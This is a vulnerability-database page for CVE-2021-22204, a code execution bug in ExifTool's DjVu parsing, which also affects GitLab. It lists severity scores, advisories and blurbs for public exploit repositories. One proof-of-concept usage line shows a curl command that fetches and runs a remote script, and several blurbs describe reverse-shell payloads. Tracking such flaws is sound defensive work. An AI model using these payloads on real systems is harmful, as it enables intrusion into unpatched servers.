613
VMScore

CVE-2021-22204

Published: 23/04/2021 Updated: 07/11/2023
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 613
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

exiftool project exiftool

debian debian linux 9.0

debian debian linux 10.0

fedoraproject fedora 32

fedoraproject fedora 33

fedoraproject fedora 34

Vendor Advisories

Debian Bug report logs - #987505 CVE-2021-22204: Improper neutralization of directives in dynamically evaluated code ('eval injection') Package: libimage-exiftool-perl; Maintainer for libimage-exiftool-perl is Debian Perl Group <pkg-perl-maintainers@listsaliothdebianorg>; Source for libimage-exiftool-perl is src:libimage-exiftool ...
A vulnerability was discovered in libimage-exiftool-perl, a library and program to read and write meta information in multimedia files, which may result in execution of arbitrary code if a malformed DjVu file is processed For the stable distribution (buster), this problem has been fixed in version 1116-1+deb10u1 We recommend that you upgrade you ...
Improper neutralization of user data in the DjVu file format in ExifTool versions 744 up to 1223 allows arbitrary code execution when parsing the malicious image ...

Exploits

ExifTool version 1223 suffers from an arbitrary code execution vulnerability ...
This Metasploit module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE) The patched versions are 13103, 1396, and 1388 Exploitation will result in command execution as the git user ...
GitLab version 13102 remote code execution exploit that provides a reverse shell ...
This Metasploit module exploits a Perl injection vulnerability in the DjVu ANT parsing code of ExifTool versions 744 through 1223 inclusive The injection is used to execute a shell command using Perl backticks The DjVu image can be embedded in a wrapper image using the HasselbladExif EXIF field ...

Mailing Lists

<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: [CVE-2021-22204] ExifTool - Arbitrary code execution in the DjVu module when parsing a malicious image <!--X-Subject-Heade ...

Github Repositories

Python exploit for the CVE-2021-22204 vulnerability in Exiftool

CVE-2021-22204-exiftool Python exploit for the CVE-2021-22204 vulnerability in Exiftool About the vulnerability The CVE-2021-22204 was discovered and reported by William Bowling (@wcbowling) This exploit was made by studying the exiftool patch after the CVE was already reported Pre-requisites Installed exiftool and djvulibre tools If you are on Debian or ubuntu you can inst

A complete PoC for CVE-2021-22204 exiftool RCE

CVE-2021-22204 A complete PoC for CVE-2021-22204 exiftool RCE

CVE-2021-22204 Description Improper neutralization of user data in the DjVu file format in ExifTool versions 744 and up allows arbitrary code execution when parsing the malicious image Script Script Link Script usage: System cmd: bash CVE-2021-2204sh "system('id')" happyjpg Reverse shell bash CVE-2021-2204sh &quo

CVE-2021-22204 About the vulnerability Improper neutralization of user data in the DjVu file format in ExifTool versions 744 and up allows arbitrary code execution when parsing the malicious image Fixed starting with version 1040-1+deb9u1 Python3 RCE exploit This script installs all the required software and generates all the required files for creating an RCE image file to

CMSpit Challenge on TryHackMe

CMSpit export IP=101024011 Konstantinos Pap - Fri 06 Aug 2021 07:47:38 AM CDT My script initialized all kinds of enumerations (gobuster, nikto and nmap) Nmap detected 2 open ports port 22 and 80 Opening firefox on the server we get a login page No matter what we type in we always end up on the login page This means we need to authenticate or bypass the authentication s

Gitlab-Exiftool-RCE RCE Exploit for Gitlab &lt; 13103 GitLab Workhorse will pass any file to ExifTool The current bug is in the DjVu module of ExifTool Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file Usage python3 exploitpy -u root -p root -c "command here" -t gitlabexa

Learn 101 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for 101 days.

learn101 This repository contains all the information shared during my Learn 101 Challenge Learn 101 is a challenge to keep the learning spirit going on and challenge myself to learn something daily for 101 Days, it can be anything from infosec to general life Follow me on Twitter for Regular Updates: @Sm4rty_ Huge thanks to Harsh Bothra and IWCON from Where I got motivated

A CVE-2021-22205 Gitlab RCE POC written in Golang

Golang-CVE-2021-22205-POC A bare bones CVE-2021-22205 Gitlab RCE POC written in Golang which affects Gitlab CE/EE &lt; 13103 Gitlab CE/EE &lt; 1396 Gitlab CE/EE &lt; 1388 I've been wanting to learn Golang for a while I decided to write a POC for CVE-2021-22205 in Golang to help familiarize myself with the language Please disregard what I am assuming is

reverse shell execution exploit of CVE 22204

CVE-2021-22204-RSE

Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution

Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution Like this repo? Give us a ⭐! For educational and authorized security research purposes only Exploit Author @UNICORDev by (@NicPWNs and @Dev-Yeoj) Vulnerability Description Improper neutralization of user data in the DjVu file format in ExifTool versions 744 and up allows arbitrary code execution when parsing

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Vuln Product Gitlab CE/EE &lt; 13103 Gitlab CE/EE &lt; 1396 Gitlab CE/EE &lt; 1388 Environment export GITLAB_HOME=/srv/gitlab sudo d

POC for exiftool vuln (CVE-2021-22204).

POC-CVE-2021-22204 nvdnistgov/vuln/detail/CVE-2021-22204 This is just a convenience script I wrote for testing Output Usage /build_imagepl &lt;cmd to inject&gt; Note: if your cmd contains unix special characters use quote! EG: /build_imagepl "curl xxxxcom/scriptsh|sh" This poc generates an image file (noteviljpg) to be procces

HTB META Initial Scans: nmap -sV -sC Directory Enumeration No directories found using: gobuster dir --url artcorphtb -w /usr/share/wordlists/dirbuster/directory-list-23-mediumtxt -t 25 &gt; gobuster_dirtxt Sub-Domain Enum Used dns proxy githubcom/hubdotcom/marlon-tools/blob/master/tools/dnsproxy/dnsproxypy Found dev01 subdmain using: gobuster dns -t 30 -w /u

CVE-2021-22204 Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution Exploit Description Use this exploit to generate a JPEG image payload that can be used with a vulnerable ExifTool version for code execution A custom command can be provided or a reverse shell can be generated A JPEG image is automatically generated, and optionally, a custom JPEG image can be supp

CVE-2021-22204 - Exiftool Remote Code Execution Description Recently, the researcher wcbowling found a vulnerability in the Exiftool tool, that enabled a malicious actor to perform a Remote code Execution attack This vulnerability was found in the Gitlab bug bounty program, where they use this tool as dependency for their product Usage In line 12 (createFilesh), put your own

Cross-platform desktop GUI app to clean image metadata

ExifCleaner Desktop app to clean metadata from images, videos, PDFs, and other files !!!!! NOTE -

OverflowWriteup Przebieg laboratorium Pierwszym krokiem było wykorzystanie oprogramowania nmap w celu rekonensanu aktywnego, użyto w tym celu komendy: sudo nmap -sS -sV -sC &lt;ip_address&gt; - sS - TCP SYN skan - sV - sprawdzenie możliwosci występowania wersji oprogramowania na otwartym porcie - sC - wykonanie podstawowych skryptów

ExifTool 远程代码执行漏洞 这应该算是CVE-2021-22204的分析文章,但更多像是我的草稿本,写满了很多杂乱无章的东西,对于漏洞分析文章而言显得有些废话了,但却让我学到很多。 说实话,我从未使用过这款工具,也几乎没有接触过Perl这门语言,导致我在分析,乃至复现的过程中心中满是

Modification of gitlab exploit anything under 13.10

Gitlab-Exiftool-RCE Original repos : githubcom/CsEnox/Gitlab-Exiftool-RCE Creds to CsEnox RCE Exploit for Gitlab &lt; 13103 GitLab Workhorse will pass any file to ExifTool The current bug is in the DjVu module of ExifTool Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file Usage pyt

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Affected Version Gitlab CE/EE &lt; 13103 Gitlab CE/EE &lt; 1396 Gitlab CE/EE &lt; 1388 Vuln Impact Soon Reference githubc

exiftool exploit

CVE-2021-22204-exiftool Python exploit for the CVE-2021-22204 vulnerability in Exiftool Video tutorial Youtube 404 notfound Requirements python3 python3-pip djvulibre-bin exiftool Install requirements Debian apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip

Unauthenticated RCE on Gitlab version &lt; 13103 Unauthenticated RCE exploit for gitlab version &lt; 13103 For educational/research purpose only Use at your own risk Root cause: When uploading image files, Gitlab Workhorse passes any files with the extensions jpg|jpeg|tiff through to ExifTool to remove any non-whitelisted tags One of the supported formats is DjVu

CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 119 GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution Vuln Product Gitlab CE/EE &lt; 13103 Gitlab CE/EE &lt; 1396 Gitlab CE/EE &lt; 1388 Environment export GITLAB_HOME=/srv/gitlab sudo d

ctf-challenges Challenge: Zip! achievement Description Give me a zip file, I will tell you all about it, including the flag in /etc/flagtxt/ Hint Do you know CVE-2021-22204 I think blog of vakzz bug hunter is very interesting Flag HCMUS-CTF{CVE_22204_1s_v3ry_1nt3r3st1ng} Ý tưởng Challenge được lấy ý tưởng t

My past public researches are archived here

heitorgouveame Some notes, analysis and proof-of-concepts about my vulnerability research journey Summary My research focus is vulnerability discovery in applications/services and exploit devlopment, I have fun bypassing modern defenses, exploring systems and playing with new technologies and in parallel: sharing some of my research

RCE Exploit for Gitlab < 13.10.3

Gitlab-Exiftool-RCE RCE Exploit for Gitlab &lt; 13103 GitLab Workhorse will pass any file to ExifTool The current bug is in the DjVu module of ExifTool Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file Usage python3 exploitpy -u root -p root -c "command here" -t gitlabexa

exiftool arbitrary code execution vulnerability

Vulnerable Version 744 ~ 1223 Reproduce $ bash craft_a_djvu_exploitsh 'cal' $ /exiftool delicatejpg Screenshot Reference NVD-CVE-2021-22204

CVE-2021-22204 About the vulnerability Improper neutralization of user data in the DjVu file format in ExifTool versions 744 and up allows arbitrary code execution when parsing the malicious image Fixed starting with version 1040-1+deb9u1 Python3 RCE exploit This script installs all the required software and generates all the required files for creating an RCE image file to